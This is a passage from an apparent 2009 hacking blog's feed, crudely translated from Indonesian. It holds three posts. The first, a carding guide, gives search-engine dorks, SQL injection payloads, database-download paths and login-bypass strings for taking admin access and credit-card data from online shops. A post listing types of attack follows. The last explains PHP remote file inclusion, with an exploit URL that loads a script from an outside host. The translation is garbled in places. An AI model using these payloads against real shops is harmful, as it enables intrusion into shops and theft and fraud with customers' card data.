/&gt;Remove / eShop and replace with -&gt; / cg-bin/eshop/database/order.mdb&lt;br /&gt;The result: www.xxxxxx.com / ... / cg-bin / eShop / database / order.mdb&lt;br /&gt;Download the file and its *. mdb Open the page file use Microsoft Acces&lt;br /&gt;(to read the database because it is a access.mdb ms access&lt;br /&gt;aja)&lt;br /&gt;&lt;br /&gt;8. example in the form of bugs shop system: Cart32 v3.5a&lt;br /&gt;example shop will appear on search engines when some mengetikan&lt;br /&gt;keyword, such as:&lt;br /&gt;google.com: Type -&gt; allinurl: / cart32.exe /&lt;br /&gt;Example: www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound&lt;br /&gt;Replace with NoItemFound -&gt; error&lt;br /&gt;If we find some error information page under installation,&lt;br /&gt;means that we will succeed!&lt;br /&gt;Now, we go on the information below, slide the page&lt;br /&gt;down, and search the Page Setup and Directory&lt;br /&gt;If the file is there with a list format / suffixes. C32&lt;br /&gt;means that the page in the site. there is a file containing data cc&lt;br /&gt;Copy a file. C32 or everything you have to program or notepad&lt;br /&gt;other text editor.&lt;br /&gt;Change page url string. be like this: http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/&lt;br /&gt;Nah .., paste one by one, the file. C32 to the end of the url you have&lt;br /&gt;modified before, with the format&lt;br /&gt;http://www.xxxxx.com/cart32/&lt;br /&gt;Example http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32&lt;br /&gt;&lt;br /&gt;9. bugs in the form of an example system stores: VP-ASP Shopping Cart 5.0&lt;br /&gt;engineering / road to the two&lt;br /&gt;google.com Type -&gt; allinurl: / vpasp / shopdisplayproducts.asp&lt;br /&gt;Open the target url and add the following string at the end of the&lt;br /&gt;shopdisplayproducts.asp&lt;br /&gt;Example:&lt;br /&gt;http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty '% 20union %...,&lt;br /&gt;fldpassword% 20from% 20tbluser% 20where% 20fldusername =&lt;br /&gt;'admin'% 20and% 20fldpassword% 20like% 20'a% 25' --&lt;br /&gt;Change the value of the last string url dg:&lt;br /&gt;% 20'a% 25' --&lt;br /&gt;20'b%% 25' --&lt;br /&gt;% 20'c% 25' --&lt;br /&gt;If successful, we will get a username and password information&lt;br /&gt;admin&lt;br /&gt;To login to the admin http://xxxx.com/vpasp/shopadmin.asp&lt;br /&gt;Find your own data, please CCnya&lt;br /&gt;&lt;br /&gt;10. bugs in the form of an example system stores: VP-ASP Shopping Cart 5.0&lt;br /&gt;example shop will appear on search engines when some mengetikan&lt;br /&gt;keyword, such as:&lt;br /&gt;google.com: Type -&gt; allinurl: / vpasp / shopsearch.asp&lt;br /&gt;&lt;br /&gt;Open the url for the target and create a new admin, postingkan following data&lt;br /&gt;one by one in the search engines:&lt;br /&gt;Keyword = &amp; category = 5); insert into tbluser (fldusername) values&lt;br /&gt;('')--&amp; = &amp; SubCategory = hide &amp; action.x = 46 &amp; action.y = 6&lt;br /&gt;Keyword = &amp; category = 5); update tbluser set fldpassword =''where&lt;br /&gt;fldusername =''--&amp; SubCategory = All &amp; action.x = 33 &amp; action.y = 6&lt;br /&gt;Keyword = &amp; category = 3); update tbluser set fldaccess ='1 'where&lt;br /&gt;fldusername =''--&amp; SubCategory = All &amp; action.x = 33 &amp; action.y = 6&lt;br /&gt;Do not forget to change and it's up to you.&lt;br /&gt;To change the admin password, enter the keyword below:&lt;br /&gt;Keyword = &amp; category = 5); update tbluser set fldpassword =''where&lt;br /&gt;fldusername = 'admin' - &amp; SubCategory = All &amp; action.x = 33 &amp; action.y = 6&lt;br /&gt;&lt;br /&gt;Login to admin, in http://xxxxxxx/vpasp/shopadmin.asp&lt;br /&gt;&lt;br /&gt;11. example in the form of bugs shop system: Lobby.asp&lt;br /&gt;example shop will appear on search engines when some mengetikan&lt;br /&gt;keyword, such as:&lt;br /&gt;google.com Type -&gt; allinurl: Lobby.asp&lt;br /&gt;Example: www.xxxxx.com / mall / lobby.asp&lt;br /&gt;Remove any posts mall / lobby.asp and replace with -&gt; fpdb / shop.mdb&lt;br /&gt;The result: www.xxxxx.com / fpdb / shop.mdb&lt;br /&gt;&lt;br /&gt;12. example in the form of bugs shop system: Shopper.cgi&lt;br /&gt;example shop will appear on search engines when some mengetikan&lt;br /&gt;keyword, such as:&lt;br /&gt;google: Type -&gt; allinurl: / cgi-local/shopper.cgi&lt;br /&gt;Example: www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&amp;key =&lt;br /&gt;Add the -&gt; &amp; template = ... order.log&lt;br /&gt;The result: www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&amp;key=...&amp;template ...&lt;br /&gt;&lt;br /&gt;13. example in the form of bugs shop system: Proddetail.asp&lt;br /&gt;example shop will appear on search engines when some mengetikan&lt;br /&gt;keyword, such as:&lt;br /&gt;Type -&gt; allinurl: proddetail.asp? Prod =&lt;br /&gt;Example: www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle&lt;br /&gt;Remove any posts proddtail.asp? Prod = SG369 and replace with -&gt; fpdb /&lt;br /&gt;vsproducts.mdb&lt;br /&gt;The result: www.xxxxxx.org / fpdb / vsproducts.mdb&lt;br /&gt;&lt;br /&gt;14. example in the form of bugs shop system: Digishop&lt;br /&gt;example shop will appear on search engines when some mengetikan&lt;br /&gt;keyword, such as:&lt;br /&gt;Type in google -&gt; inurl: "/ cart.php? m ="&lt;br /&gt;Example: http://xxxxxxx.com/store/cart.php?m=view.&lt;br /&gt;Remove any posts cart.php? M = view and replace with -&gt; admin&lt;br /&gt;The result http://xxxxxx.com/store/admin&lt;br /&gt;You go the same username pass it on statment SQL injection&lt;br /&gt;&lt;br /&gt;Usename: 'or "="&lt;br /&gt;Password: 'or "="&lt;br /&gt;&lt;br /&gt;.:: Note !::..&lt;br /&gt;I DONT TAKE ANY responsible for ANYTING ... U TAKE UR OWN RISK ..!!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-2810155816878140070?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/2810155816878140070/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/07/1.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2810155816878140070'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2810155816878140070'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/07/1.html' title='Engineering carding'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-5645705552439002079</id><published>2009-07-22T01:27:00.000-07:00</published><updated>2009-10-08T05:36:50.240-07:00</updated><title type='text'>Identify Type of Hacker Attacks</title><content type='html'>In the world of hacking (cracking precisely ding?) Recognized several types of attacks against&lt;br /&gt;server. The following types of basic attacks that can be grouped in at least 6&lt;br /&gt;classes, namely:&lt;br /&gt;&lt;br /&gt;Intrusion&lt;br /&gt;---------&lt;br /&gt;This type of attack on a cracker (hacker level generally is) will be&lt;br /&gt;using the computer system server. The attack is more focused on the full access granted&lt;br /&gt;and does not aim to destroy. This type of attack is &lt;span class="fullpost"&gt;&lt;br /&gt;also applied to you by the hacker to&lt;br /&gt;test their network security systems. Done in several stages and is not in&lt;br /&gt;scheme on each specific job serangannya (described in another article).&lt;br /&gt;Hacking is an Art? =)&lt;br /&gt;&lt;br /&gt;Denial of Services (DoS)&lt;br /&gt;------------------------&lt;br /&gt;On the type of DoS attack caused the server service stuck because of flooded&lt;br /&gt;request engine attacker. In the example the case of Distributed Denial of Services (DDoS)&lt;br /&gt;for example, using the zombie machines, the attacker will do packeting&lt;br /&gt;request on the server simultaneously and simultaneous asymmetric so that the buffer server akan&lt;br /&gt;a loss to answer them? Stuck / hung akan override server. So, not the server name again?&lt;br /&gt;(servicenya dead ripe spelled server? hehehe ....)&lt;br /&gt;&lt;br /&gt;Joyrider&lt;br /&gt;--------&lt;br /&gt;Nah, the name of this fraudulent? Because the most read novels of hacking and I can&lt;br /&gt;learn correct, isenglah happens nyoba-nyoba a nyerang sciences IM super fast&lt;br /&gt;(the term 'masturbation' dimesin people). Or why not with a machine the contents? =).&lt;br /&gt;Clear that this type of attack average because I want to taste, but there is also the&lt;br /&gt;cause damage or loss of data.&lt;br /&gt;&lt;br /&gt;Vandal&lt;br /&gt;------&lt;br /&gt;Type of attack pengrusak specialist? nothing else to explain champion? =)&lt;br /&gt;&lt;br /&gt;Scorekeeper&lt;br /&gt;-----------&lt;br /&gt;Attacks that aim to reach a reputation of cracking most. Usually only&lt;br /&gt;shaped deface web pages (index / nambah page) and with memampangakan NickName&lt;br /&gt;certain groups. Most still do not care with the contents of the target machine =).&lt;br /&gt;When this type of attacker is more known as Wannabe / script kiddies.&lt;br /&gt;&lt;br /&gt;Spy&lt;br /&gt;---&lt;br /&gt;Three hurup only. Type of attack to obtain confidential information or data from machines&lt;br /&gt;target. Usually attack the machine with the database inside the application. Sometimes&lt;br /&gt;anchor company to rent a 'detective' to steal corporate data rivalnya? How&lt;br /&gt;try Pak? =)&lt;br /&gt;&lt;br /&gt;So little about the first type of attack on the target machine is most certainly&lt;br /&gt;Hopefully a good reference although it is less feasible. Revilement can&lt;br /&gt;addressed to me personally?&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-5645705552439002079?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/5645705552439002079/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/07/in-world-of-hacking-cracking-precisely.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5645705552439002079'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5645705552439002079'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/07/in-world-of-hacking-cracking-precisely.html' title='Identify Type of Hacker Attacks'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-5694829681049856760</id><published>2009-07-22T00:51:00.000-07:00</published><updated>2009-10-08T05:36:32.417-07:00</updated><title type='text'>PHP INJECTION</title><content type='html'>° FOREWORD&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;Remote file inclusion can be defined as inserting a file from an external file in a webserver with the goal of the script will be executed when the file is loaded in disisipi. This technique requires that the webserver is able to run the server side scripting (PHP, ASP, etc) and disisipi file that is created using the script language. Target remote file inclusion usually shaped a portal or content management system (CMS) so that many number of websites vulnerable to &lt;span class="fullpost"&gt;this type of attack.&lt;br /&gt;&lt;br /&gt;In this article we will be discussing how the file inclusion (which we call the term 'injection') can occur in the PHP language.&lt;br /&gt;&lt;br /&gt;° HOW CAN Happen?&lt;br /&gt;--------&lt;br /&gt;&lt;br /&gt;A file inclusion attacks occur based on the error or inadvertence pendeklarasian variables in a file. A variable that is not declared or defined correctly can be exploited. Terms of the occurrence of injection itself consists of:&lt;br /&gt;&lt;br /&gt;1. Variables that are not declared correctly (unsanitized variables)&lt;br /&gt;&lt;br /&gt;Variables in PHP have the syntax:&lt;br /&gt;&lt;br /&gt;# 1 include ($ namavariable ". / File ...")&lt;br /&gt;# 2 require_once ($ namavariable. / File ...)&lt;br /&gt;# 3 include_once ($ variable. / File ...)&lt;br /&gt;&lt;br /&gt;For example we have a file called jscript.php and there are variables like this:&lt;br /&gt;&lt;br /&gt;...&lt;br /&gt;include ($ my_ms [ "root "].'/ error.php ');&lt;br /&gt;...&lt;br /&gt;&lt;br /&gt;These variables have the possibility to file disisipi from outside eksploit webserver with PHP script injection:&lt;br /&gt;&lt;br /&gt;http://www.target.com/ [Script Path] / jscript.php? my_ms [root] = http://www.injek-pake-kaki.com/script?&lt;br /&gt;&lt;br /&gt;Above is an example of exploitation MySpeach &lt;= v3.0.2 (my_ms [root])&lt;br /&gt;&lt;br /&gt;2. Settings in php.ini file&lt;br /&gt;&lt;br /&gt;# 1. register_globals = On&lt;br /&gt;# 2. magic_quotes = off&lt;br /&gt;# 3. allow_fopenurl = on&lt;br /&gt;&lt;br /&gt;° BERBAHAYAKAH?&lt;br /&gt;-------------&lt;br /&gt;&lt;br /&gt;File inclusion has a high risk level (High Risk) is very dangerous and even level (Very Dangerous) because the injection permit perpetrators to perform remote command execution (Remote Commands Execution) of the server. This is very dangerous for a server if the perpetrators attempt to gain access to the higher ways to exploit local, so that it can only get access to the administrator or root.&lt;br /&gt;&lt;br /&gt;In general the risk of attacks is:&lt;br /&gt;&lt;br /&gt;1. Web root folder / subdirectory defacing.&lt;br /&gt;2. Previledge escalation (to get access higher).&lt;br /&gt;3. Running in the process server (psyBNC, bots, etc.)&lt;br /&gt;4. Pilfering aka theft data (information such as credentials, credit cards, etc. ..)&lt;br /&gt;5. And more ...!!! Action including takeovers and server ddos!&lt;br /&gt;&lt;br /&gt;° SYSTEM OPERATION immune WHAT?&lt;br /&gt;------------------------------&lt;br /&gt;&lt;br /&gt;I remember playing C &amp; C Generals (my fave game!) When a hacker out of the barracks. They say "NO SYSTEMS IS SAFE!". Precisely! There is no operating system safe from injection attacks as long as they use a server side scripting that can be exploited, no matter whether it is Microsoft Windows, Linux, FreeBSD, Solaris, Darwin OS, and others.&lt;br /&gt;&lt;br /&gt;° What should be done?&lt;br /&gt;-------------------------&lt;br /&gt;&lt;br /&gt;Many portals and communities who are often white hat releases about the latest bugs injection. Most secure way is to always consider the development of which they do so you can make a few improvements to the CMS, which means that now you may use. Always look at the raw logs are usually located on your hosting service. If there is a rather fetching as deviant GET / index.php? Page = http://www.injek-pake-kaki.net/cmd? you must suspicious, because this can only attack against the web portal, or that you manage.&lt;br /&gt;&lt;br /&gt;One of the most secure technique for an administrator is to always consider the efforts infiltration and exploitation of local business. Use a firewall to prevent the infiltration of those who are not responsible for and attention to port-server port that is open.&lt;br /&gt;&lt;br /&gt;° Ending&lt;br /&gt;------&lt;br /&gt;&lt;br /&gt;I write this article based on what I know, and if there is a mistake because my ignorance you can contact me via email. Experience is the best teacher for us all. All can happen because there is no time made perfect. Nobody is perfect! No systems is safe!&lt;br /&gt;&lt;br /&gt;° REFERENCES&lt;br /&gt;---------&lt;br /&gt;&lt;br /&gt;- Http://net-square.com/papers/one_way/one_way.html (Very simple haxing guides)&lt;br /&gt;- Www.milw0rm.com (Nice place to looking for exploits and buggy things)&lt;br /&gt;- Http://www.packetstormsecurity.org (Great advisory, toolz, exploits and archives)&lt;br /&gt;- Www.google.com (Greatest place to ask!)&lt;br /&gt;- Http://www.ultrapasswords.com/ (Place cooling down to ... We love streaming vids! Yeah!)&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-5694829681049856760?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/5694829681049856760/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/07/php-injection_22.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5694829681049856760'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5694829681049856760'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/07/php-injection_22.html' title='PHP INJECTION'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry></feed>
